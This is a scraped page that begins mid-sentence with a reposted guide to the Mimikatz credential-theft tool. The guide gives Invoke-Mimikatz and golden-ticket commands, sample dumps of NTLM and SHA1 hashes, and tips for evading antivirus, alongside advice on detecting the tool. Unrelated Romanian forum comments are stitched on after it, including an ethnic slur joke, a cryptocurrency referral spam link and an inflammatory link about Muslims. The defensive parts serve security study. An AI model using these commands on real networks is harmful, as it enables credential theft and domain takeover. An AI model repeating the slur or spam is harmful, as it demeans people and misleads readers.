memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the “PowerShellMafia” GitHub repository. What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system. Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. Use mimikatz to dump credentials out of LSASS: Invoke-Mimikatz -DumpCreds Use mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz –DumpCerts Elevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug exit” -ComputerName “computer1” The Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands. Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz. Detecting Mimikatz: There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it. I then replaced “Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The detection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. Benjamin Delpy publishes YARA rules for Mimikatz on the Mimkatz GitHub repository. Run AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated 11/11/2015 (32bit & 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the scan results. Note that Benjamin has noted real-world results to be less successful. However, AV will usually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in depth”. Mimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition] Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use. HoneyTokens/HoneyHashes involves placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. this requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment. If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS and there are systems where it was switched to “1”, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well). Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14-068 Kerberos vulnerability exploitation. Enable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz from working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts with LSASS. Mimikatz & LSA Protection: Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs): The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. Enabling LSA protection: Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa. In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”). Detecting Invoke-Mimikatz: Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5. Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter “*” and click OK. This will log all PowerShell activity including all PowerShell modules. PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via Windows Event Forwarding or similar) or SIEM. Parse PowerShell events for the following: “System.Reflection.AssemblyName” “System.Reflection.Emit.AssemblyBuilderAccess “ “System.Runtime.InteropServices.MarshalAsAttribute” “TOKEN_PRIVILEGES” “SE_PRIVILEGE_ENABLED“ Note: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a “sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords. Detecting Offensive PowerShell Tools: Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging. “GetDelegateForFunctionPointer” “System.Reflection.AssemblyName“ “System.Reflection.Emit.AssemblyBuilderAccess“ “System.Management.Automation.WindowsErrorReporting” “MiniDumpWriteDump” “TOKEN_IMPERSONATE” “TOKEN_DUPLICATE” “TOKEN_ADJUST_PRIVILEGES” “TOKEN_PRIVILEGES” “Sneaky” Mimikatz Execution: Casey Smith (@subtee & blog) has done a LOT of work showing how application whitelisting is not the panacea many believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy. Casey also has come up with many creative and sneaky ways to execute Mimikatz. Execute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities Proof of Concept Mimikatz packed & hidden in an image file Downloads and Executes Mimikatz In Memory From GitHub Most Popular Mimikatz Commands: Here are just some of the most popular Mimikatz command and related functionality. CRYPTO::Certificates – list/export certificates KERBEROS::Golden – create golden/silver/trust tickets KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”. KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust). LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC. LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt” LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer. LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest). MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials. MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password. PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands). SEKURLSA::Ekeys – list Kerberos encryption keys SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account) SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials. SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash SEKURLSA::T`ickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). TOKEN::List – list all tokens of the system TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials. ADSecurity Mimikatz Posts: All posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts Mimikatz and Active Directory Kerberos Attacks“ Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync How Attackers Use Kerberos Silver Tickets to Exploit Systems Mimikatz DCSync Usage, Exploitation, and Detection Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP) Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) Kerberos Golden Tickets are Now More Golden It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts Detecting Mimikatz Use Mimikatz Command Guide: Mimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit (example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode. Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully). PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 17 modules * * */ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO The interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time: PS C:\temp\mimikatz> .\mimikatz .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 17 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO credman : Mimikatz Command Reference: Mimikatz Modules: CRYPTO CRYPTO::Certificates DPAPI EVENT KERBEROS Golden Tickets Silver Tickets Trust Tickets KERBEROS::PTT LSADUMP DCSync LSADUMP::LSA LSADUMP::SAM LSADUMP::Trust MISC MINESWEEPER NET PRIVILEGE PRIVILEGE::Debug PROCESS SERVICE SEKURLSA SEKURLSA::Kerberos SEKURLSA::Krbtgt SEKURLSA::LogonPasswords SEKURLSA::Pth STANDARD TOKEN TOKEN::Elevate TOKEN::Elevate /domainadmin TS VAULT NOTE: Any item marked “experimental” should only be used in test environments. CRYPTO The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (CryptoAPI). Typical use is to export certificates that aren’t marked as “exportable.” CRYPTO::CAPI– (experimental) Patch CryptoAPI layer for easy export CRYPTO::Certificates – list/export certificates Carlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates. This command lists certificates and properties of theirs keys. It can export certificates too. Typically requires “privilege::debug” /systemstore – optional – the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER) /store – optional – the store that must be used to list/export certificates (default: My) – full list with crypto::stores /export – optional – export all certificates to files (public parts in DER, private parts in PFX files – password protected with: mimikatz) Benjamin’s comments on CRYPTO:Certificates: See crypto::stores for valid systemstore list, and its output for store list. Non exportable keys (with KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) can often be exported with crypto::capiand/or crypto::cng Despite crypto::capi or crypto::cng patch, you must have correct ACL on filesystem to access private keys (UAC… ) Some smartcard crypto providers can report a successfull private export (it’s not, of course ) CRYPTO::CNG– (experimental) Patch CNG service for easy export (patches “KeyIso” service) CRYPTO::Hash – hash a password (with optional user name) CRYPTO::Keys– list/export keys containers CRYPTO::Providers – list cryptographic providers CRYPTO::Stores – list cryptographic stores /systemstore – optional – the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER) Store Options: CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE CERT_SYSTEM_STORE_USERS or USERS CERT_SYSTEM_STORE_SERVICES or SERVICES DPAPI DPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey DPAPI:Cache DPAPI::CAPI – CAPI key test DPAPI::CNG – CNG key test DPAPI::Cred – CRE test DPAPI::CredHist – Configure a Credhist file DPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending) DPAPI::Protect – Protect data using DPAPI DPAPI::Vault – VAULT test EVENT EVENT::Clear – Clear an event log EVENT:::Drop – (experimental) Patch Events service to avoid new events KERBEROS The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API. No special rights are required for the commands in this module. KERBEROS::Clist – list tickets in MIT/Heimdall ccache KERBEROS::Golden – create golden/silver/trust tickets The capability of this command is based on the password hash type retrieved. Type Requirement Scope Golden KRBTGT hash Domain/Forest Silver Service hash Service Trust Trust hash Domain/Forest -> Domain/Forest (based on account access) Golden Ticket A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign. A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time. Mimikatz Golden Ticket Command Reference: The Mimikatz command to create a golden ticket is “kerberos::golden” /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”. /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”. /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter. /user – username to impersonate /groups (optional) – group RIDs the user is a member of (the first is the primary group). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below). /krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT. /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID). /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). /sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest). /aes128 – the AES128 key /aes256 – the AES256 key Golden Ticket Default Groups: Domain Users SID: S-1-5-21<DOMAINID>-513 Domain Admins SID: S-1-5-21<DOMAINID>-512 Schema Admins SID: S-1-5-21<DOMAINID>-518 Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt Command Example: .\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt” exit Golden Ticket References: * Golden Tickets are now More Golden (with SID History) Update1/5/2016: In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket. Mimikatz code diff: More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the Detecting Forged Kerberos Tickets section. Articol complet: https://adsecurity.org/?page_id=1821

Cere toate datele clientului + nr de telefon . Curierul o sa trebuiasca sa il sune daca nu este acasa de exemplu. Nu e problema, si eu am esuat de multe ori..dar asa inveti..stai linistit.

Am vrut sa-ti scriu ceva dar mi-am dat seama suficient de repede ca nu se merita. Intram in polemici aiurite. Imi sterg si postul initial.

Daca gasiti un tigan injunghiat in spate, sa stiti de la mine ca e vorba doar de un alt caz de sinucidere! :)))))

Exista design si pe hartie, nu doar pe calculator

@Che Daca ma iau dupa ce zice lumea pe internet nu mai faceam un ban toata viata mea. Asta de mai sus daca a scos doar 200 de dolari intr-un an inseamna ca e jalnic la ce facea, pe bune. Eu tratez site-urile mele ca si afacerea mea, care daca stau bine si ma gandesc chiar este si muncesc zi si noapte pentru ea pentru ca ma simt euforic, este businessul meu daca nu muncesc eu pentru mine atunci cine o sa o faca?! Is bucuros in fiecare dimineata cand vad ca peste noapte s-a mai vandut ceva, asta ma impinge sa muncesc din ce in ce mai mult. In dimineata asta de exemplu m-am trezit si am vazut ca am mai facut 123 $ cat AM DORMIT, asta e de ajuns pentru mine incat sa ma faca sa muncesc mai mult astazi. Observ ca la inceput eram mai stresat in legatura cu clientii si cum trebuia sa stau de vorba cu ei, acum mi-am intrat in mana...creez relatii cu clientii fara sa vreau. Toti or sa spuna ca x a murit...sau ca y nu mai merge, lasa-i sa spuna, e in avantajul tau....ai mai putina competitie pentru ca sunt pitigoi deastia care apleaca urechea la tot ce zboara. Numai Bine.

te pui cu forumistii ... experti in fizica cuantica, robotica, cibernetica, drept civil si mari cunoscatori de femei bune ... (mai ales astia de nu au nici 16 ani)

Haideti sa va spun eu cum este in Germania. Vin acasa cu mandat de confiscare a "sculelor". In ciuda faptului ca au mandat si le pot confisca pentru investigatie (fara intrebari), isi cer scuze pentru deranj, intreaba daca esti de acord sa le ia si daca folosesti tehnologii pentru criptografie. Daca spui ca folosesti, intreaba daca vrei sa le dai parolele pentru access. Toate astea ei le noteaza si tin cont de faptul daca ai cooperat sau nu. De exemplu, daca ei cauta ceva pentru o frauda informatica, si nu vor gasi nimic, daca cooperezi, nu o sa se lege de tine pentru altceva. (aplicatii diverse, filme, muzica, etc). Daca nu cooperezi, sunt toate sansele sa se lege si de alea. Cu tehnologia e mai greu, ma gandesc ca daca nu au astia in Germania, aia din Romania s-ar uita la un scsi ca proasta la p**a. Pentru criptografie au tool-uri profesionale, asta garantat. Gandindu-ma la ce dezvoltata este Romania (lol ma), si cum functioneaza acolo protectia sociala si drepturile persoanelor private, ei pot face si altceva: Te ia, iti da 400 de pulane, ia un boschetar, il platesc pe ala, il pun de martor ca a asistat la mai stiu eu ce "cyber furtisag" si aia e tot. Daca aveti ceva documente de tinut, le puteti tine in flash-ul de la imprimanta sau in mp3. // offtopic @Paul4games: In Romania nu-i zice "Politie". Poate pulitie sau militie, iar la militieni le zice militisti =) Stiti unitatea de masura a prostiei ? E, unitatea de masura a prostiei este tianul si are ca multiplii: decitianul, centitianul si militianul.

@immun3: Înseamn? c? cei de la RSA sunt ni?te idio?i. Not. @waingro: O d?m pe criptografie f?r? s? avem habar de func?ii? Fii serios.

Orice lege ar exista ,nu o sa te poata obliga vreodata cineva "sa nu uiti " . E simplu , raspunsul tau este "am uitat parola " . Practic insa , lucrurile stau cu totul altfel . Daca vor sa afle neaparat ceva de la tine te bat(la propriu) de te pisi pe tine zile intregi ,chiar saptamani daca e nevoie si vor spune ca ti-ai facut singur ranile ,in camera de arest .Imi asum ceea ce afirm , nu sunt povesti .

Gratis 0.01 Bitcoin Valorbit este o moneda noua care se castiga prin promovare, prin invitatii.La intregistrare primiti 10000 VALPentru share pe facebook, twitter si linkedin primiti inca 1000 VAL pentru fiecare in parte.Deocamdata nu exista exchange dar se lucreaza. apare pe c-cex maineMoneda se poate si mina.Are atat wallet in browser cat si pentru windows.Va recomand sa va faceti cont direct cu facebook-ul, primiti mai multe monede. daca este verificat cu numar de telefon http :// bit. ly/ 1oiFtrl

http://fossbytes.com/muslims-support-terrorism-as-suggested-by-google/